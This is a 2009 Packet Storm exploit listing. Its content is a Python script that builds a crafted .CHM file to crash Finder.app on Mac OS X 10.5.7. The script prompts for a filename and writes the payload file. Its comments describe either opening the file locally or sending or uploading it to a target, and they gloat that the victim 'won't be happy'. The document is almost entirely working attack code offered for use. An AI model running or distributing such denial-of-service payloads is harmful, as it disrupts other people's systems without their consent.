Mac OS X 10.5.7 .CHM Denial Of Service

2009-08-07T00:00:00
ID PACKETSTORM:80140
Type packetstorm
Reporter Dr_IDE
Modified 2009-08-07T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
import os;  
  
print """  
###############################################################################  
# #  
# Mac OS X 10.5.7 Local Finder.app DoS (.CHM) #  
# By: Dr_IDE and s0kket #  
# Greets to offsec #  
# Tested on OS X 10.5.7 (This will most likely kill more than this version. #  
# #  
###############################################################################  
\n""";  
  
fname = (raw_input(" [*] Enter the filename you would like to create:"));  
print " [*] Creating Evil .CHM file...";  
  
try:  
f1 = open(fname + '.chm','w');  
f1.write("#################################################\n");  
f1.write("# #\n");  
f1.write("# OSX 10.5.7(X?) Local Finder.app DoS (.CHM) #\n");  
f1.write("# By: Dr_IDE and s0kket. #\n");   
f1.write("# Greets to offsec. #\n");  
f1.write("# It really shouldn't be this easy... #\n");  
f1.write("# #\n");  
f1.write("#################################################\n\n");  
f1.close();  
  
print " [*] Payload has been created.";  
print " [*] If the user opens the payload with Finder they won't be happy.";  
  
#  
# There are two options for this attack:  
# 1.) You can choose to automagically open the chm finder.   
# As long as a VMware/Parallels isn't installed then finder is   
# the default app for this extension.  
#  
# 2.) We will just create file and send it/upload it to the target.   
#  
# Note: Only uncomment one of these lines at a time.  
#  
  
# This will mess up the system pretty bad, only way out is   
# reboot or force quit of Finder.app  
#x = os.system('open ' + fname + '.chm');  
  
# This will create the offending .chm file and quit.  
x = raw_input(" [*] Press Enter to Quit.");  
  
except:  
print "Error."  
  
`